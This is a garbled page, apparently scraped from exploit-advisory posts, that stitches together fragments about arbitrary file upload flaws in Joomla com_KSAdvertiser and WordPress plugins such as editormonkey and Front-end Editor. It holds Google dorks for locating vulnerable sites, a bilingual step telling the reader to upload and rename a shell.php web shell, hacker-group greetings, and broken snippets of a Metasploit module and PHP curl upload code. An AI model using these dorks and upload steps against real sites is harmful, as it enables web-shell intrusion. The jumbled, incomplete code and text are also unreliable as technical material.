Vaya a imagenes y dele click a upload, examine su archivo shell.php y renombrelo a Ĥ. Go to images and give click to upload, browse your file shell.php, and rename it to # Google Dork: inurl:index.php?option=com_ksadvertiser # Exploit Title: Joomla com_KSAdvertiser Remote File & Bypass Upload Vulnerability # d3c0d3r - Dr.Security - Mr.Xpr - Bl4ck_king - hellboy - Shekaf & All Members In IrIsT.Ir # R3ZA BLACK HAT - TaK.FaNaR - m3hdi - F () rid - joker_s - H4x0r - dr.tofan - skote_vahshat. # Greats : B3HZ4D - Crim3R - nimaarek - 0x0ptim0us - Net.Edit0r - A.Cr0x - G3n3rall. # Tested on : GNU/Linux Ubuntu - Windows Server - win7 # Exploit Title : Wordpress (editormonkey) Arbitrary File Upload Vulnerability 'Version' = > '0.1', # Beta Version Just for Pene-Test/Help - Wait the Best ! 'References' = > [ 'URL', '', 'Author' = >, # MSF Module 'License' = > MSF_LICENSE, The vulnerability allows for arbitrary file uploadĪnd remote code execution POST Data to Vulnerable Script /File in the plugin. This module exploits an arbitrary PHP File Upload and Code Execution flaw in some Shell Access : # $Id: wp_gupload.rb 04:35:01Z KedAns-Dz $ #Ĭlass Metasploit3 'WordPress Generic plugins Arbitrary File Upload', # Author : Sammy FORGIT - sam at opensyscom dot fr - Ĭurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1) Ĭurl_setopt($ch, CURLOPT_HTTPHEADER, $headers)
# Google Dork : inurl:/wp-content/plugins/front-end-editor/ # Description : Wordpress Plugins - Front-end Editor Arbitrary File Upload Vulnerability
0 kommentar(er)
